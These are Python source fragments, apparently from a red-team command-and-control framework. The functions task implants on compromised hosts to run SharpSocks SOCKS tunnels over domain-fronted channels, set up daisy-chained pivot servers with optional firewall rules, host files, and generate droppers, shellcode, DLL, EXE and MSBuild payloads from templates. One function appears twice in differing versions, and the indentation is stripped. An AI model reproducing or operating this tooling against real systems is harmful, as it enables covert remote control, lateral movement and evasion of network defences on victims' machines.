def do_sharpsocks(user, command, randomuri):
check_module_loaded("SharpSocks.ps1", randomuri, user)
import string
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"),
select_item("DomainFrontHeader", "C2Server"))
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
implant = get_implantdetails(randomuri)
pivot = implant.Pivot
if pivot != "PS":
sharpurl = input("Enter the URL for SharpSocks: ")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
(channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if (ri == "") or (ri.lower() == "y"):
taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % (
sharpurl, channel, sharpkey, sharpurls)
if dfheader:
taskcmd += " -DomainFrontURL %s" % dfheader
new_task(taskcmd, user, randomuri)
update_label("SharpSocks", randomuri)
def do_createdaisypayload(user, command):
name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
daisyurl = input(f"Daisy URL: e.g. {default_url} ")
if ("http://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
if ("https://127.0.0.1" in daisyurl):
daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
pbindsecret = PBindSecret
pbindpipename = PBindPipeName
daisyurl, daisyurl_count = string_to_array(daisyurl)
daisyhostheader = ""
c = 0
daisyurls = daisyurl.split(",")
for url in daisyurls:
if c > 0:
daisyhostheader += ",\"\""
else:
daisyhostheader += "\"\""
c += 1
C2 = get_c2server_all()
urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "",
"", "", "")
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
PowerShellProxyCommand=proxynone,
URLID=urlId,
PBindPipeName=pbindpipename,
PBindSecret=pbindsecret)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (daisyurl),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers("%s_" % name)
newPayload.CreateShellcode("%s_" % name)
newPayload.CreateRaw("%s_" % name)
newPayload.CreateDlls("%s_" % name)
newPayload.CreateEXE("%s_" % name)
newPayload.CreateMsbuild("%s_" % name)
newPayload.CreateDonutShellcode("%s_" % name)
newPayload.BuildDynamicPayloads("%s_" % name)
print_good("Created new %s daisy payloads" % name)
input("Press Enter to continue...")
clear()
def do_add_hosted_file(user, command):
FilePath = input("File Path: .e.g. /tmp/application.docx: ")
URI = input("URI Path: .e.g. /downloads/2020/application: ")
ContentType = input("Content Type: .e.g. (text/html): ")
if ContentType == "":
ContentType = "text/html"
Base64 = no_yes_prompt("Base64 Encode File")
if not Base64:
Base64 = "No"
else:
Base64 = "Yes"
if not URI or not FilePath:
print_bad("Please enter a FilePath and URI")
input("Press Enter to continue...")
clear()
return
insert_hosted_file(URI, FilePath, ContentType, Base64, "Yes")
FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
print_good("Added hosted-file \n\n%s%s -> %s (%s)\r\n" % (FirstURL, URI, FilePath, ContentType))
do_show_hosted_files(user, command)
clear()
def do_sharpsocks(user, command, randomuri):
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurls = sharpurls.split(",")
sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"),
select_item("DomainFrontHeader", "C2Server"))
dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server"))
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" %
(channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri == "":
if dfheader:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", ""), dfheader), user,
randomuri)
else:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", "")), user,
randomuri)
if ri.lower() == "y":
if dfheader:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", ""), dfheader), user,
randomuri)
else:
new_task(
"run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken"
% (sharpurl, channel, sharpkey, sharpurls[0].replace(
"\"", ""), sharpurls[1].replace("\"", "")), user,
randomuri)
print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def __init__(self, KillDate, Key, Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory, URLID=None, ImplantType="", PowerShellProxyCommand="", PBindPipeName=DefaultPBindPipeName, PBindSecret=DefaultPBindSecret):
if not URLID:
URLID = get_default_url_id()
self.URLID = URLID
urlDetails = get_url_by_id(self.URLID)
self.KillDate = KillDate
self.Key = Key
self.QuickCommand = select_item("QuickCommand", "C2Server")
self.FirstURL = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
self.PayloadCommsHost = urlDetails[2]
self.DomainFrontHeader = urlDetails[3]
self.Proxyurl = urlDetails[4]
self.Proxyuser = urlDetails[5]
self.Proxypass = urlDetails[6]
self.PowerShellProxyCommand = PowerShellProxyCommand
self.ImplantType = ImplantType
self.Insecure = Insecure
self.UserAgent = UserAgent
self.Referrer = Referrer
self.ConnectURL = ConnectURL
self.BaseDirectory = BaseDirectory
self.PBindPipeName = PBindPipeName if PBindPipeName else DefaultPBindPipeName
self.PBindSecret = PBindSecret if PBindSecret else DefaultPBindSecret
self.BaseDirectory = BaseDirectory
self.PSDropper = ""
self.PyDropper = ""
if os.path.exists("%saes.py" % PayloadsDirectory):
with open("%saes.py" % PayloadsDirectory, 'r') as f:
content = f.read()
m = re.search('#KEY(.+?)#KEY', content)
if m:
keyfound = m.group(1)
self.PyDropperHash = hashlib.sha512(content.encode("utf-8")).hexdigest()
self.PyDropperKey = keyfound
else:
self.PyDropperKey = str(gen_key().decode("utf-8"))
randomkey = self.PyDropperKey
with open("%saes.py" % PayloadTemplatesDirectory, 'r') as f:
content = f.read()
aespy = str(content).replace("#REPLACEKEY#", "#KEY%s#KEY" % randomkey)
filename = "%saes.py" % (self.BaseDirectory)
with open(filename, 'w') as f:
f.write(aespy)
self.PyDropperHash = hashlib.sha512((aespy).encode('utf-8')).hexdigest()
with open("%sdropper.ps1" % PayloadTemplatesDirectory, 'r') as f:
content = f.read()
self.PSDropper = str(content) \
.replace("#REPLACEINSECURE#", self.Insecure) \
.replace("#REPLACEHOSTPORT#", self.PayloadCommsHost) \
.replace("#REPLACECONNECTURL#", (self.ConnectURL + self.ImplantType)) \
.replace("#REPLACEIMPTYPE#", self.PayloadCommsHost) \
.replace("#REPLACEKILLDATE#", self.KillDate) \
.replace("#REPLACEPROXYUSER#", self.Proxyuser) \
.replace("#REPLACEPROXYPASS#", self.Proxypass) \
.replace("#REPLACEPROXYURL#", self.Proxyurl) \
.replace("#REPLACEPROXYCOMMAND#", self.PowerShellProxyCommand) \
.replace("#REPLACEDOMAINFRONT#", self.DomainFrontHeader) \
.replace("#REPLACECONNECT#", self.ConnectURL) \
.replace("#REPLACEUSERAGENT#", self.UserAgent) \
.replace("#REPLACEREFERER#", self.Referrer) \
.replace("#REPLACEURLID#", str(self.URLID)) \
.replace("#REPLACEKEY#", self.Key)
def do_startdaisy(user, command, randomuri):
check_module_loaded("invoke-daisychain.ps1", randomuri, user)
elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
domain_front = ""
proxy_user = ""
proxy_pass = ""
proxy_url = ""
cred_expiry = ""
if elevated.lower() == "n":
cont = input(
Colours.RED +
"Daisy from an unelevated context can only bind to localhost, continue? y/N "
+ Colours.END)
if cont.lower() == "n" or cont == "":
return
bind_ip = "localhost"
else:
bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " +
Colours.END)
bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " +
Colours.END)
firstdaisy = input(Colours.GREEN +
"Is this the first daisy in the chain? Y/n? " +
Colours.END)
default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
default_df_header = get_first_dfheader(DomainFrontHeader)
if default_df_header == default_url:
default_df_header = None
if firstdaisy.lower() == "y" or firstdaisy == "":
upstream_url = input(Colours.GREEN +
f"C2 URL (leave blank for {default_url}): " +
Colours.END)
domain_front = input(
Colours.GREEN +
f"Domain front header (leave blank for {str(default_df_header)}): "
+ Colours.END)
proxy_user = input(
Colours.GREEN +
"Proxy user (<domain>\\<username>, leave blank if none): " +
Colours.END)
proxy_pass = input(Colours.GREEN +
"Proxy password (leave blank if none): " +
Colours.END)
proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " +
Colours.END)
cred_expiry = input(
Colours.GREEN +
"Password/Account Expiration Date: .e.g. 15/03/2018: ")
if not upstream_url:
upstream_url = default_url
if not domain_front:
if default_df_header:
domain_front = default_df_header
else:
domain_front = ""
else:
upstream_daisy_host = input(Colours.GREEN +
"Upstream daisy server: " + Colours.END)
upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " +
Colours.END)
upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
if domain_front:
command = command + f" -domfront {domain_front}"
if proxy_url:
command = command + f" -proxyurl '{proxy_url}'"
if proxy_user:
command = command + f" -proxyuser '{proxy_user}'"
if proxy_pass:
command = command + f" -proxypassword '{proxy_pass}'"
if elevated.lower() == "y" or elevated == "":
firewall = input(Colours.GREEN +
"Add firewall rule? (uses netsh.exe) y/N: ")
if firewall.lower() == "n" or firewall == "":
command = command + " -nofwrule"
else:
print_good(
"Not elevated so binding to localhost and not adding firewall rule"
)
command = command + " -localhost"
urls = get_allurls()
command = command + f" -urls '{urls}'"
new_task(command, user, randomuri)
update_label("DaisyHost", randomuri)
createpayloads = input(
Colours.GREEN +
"Would you like to create payloads for this Daisy Server? Y/n ")
if createpayloads.lower() == "y" or createpayloads == "":
name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
daisyhost = get_implantdetails(randomuri)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"",
"\"\"", proxy_url, proxy_user, proxy_pass,
cred_expiry)
newPayload = Payloads(C2.KillDate,
C2.EncKey,
C2.Insecure,
C2.UserAgent,
C2.Referrer,
"%s?d" % get_newimplanturl(),
PayloadsDirectory,
URLID=urlId,
PowerShellProxyCommand=proxynone)
newPayload.PSDropper = (newPayload.PSDropper).replace(
"$pid;%s" % (upstream_url),
"$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
newPayload.CreateDroppers(name)
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
print_good("Created new %s daisy payloads" % name)
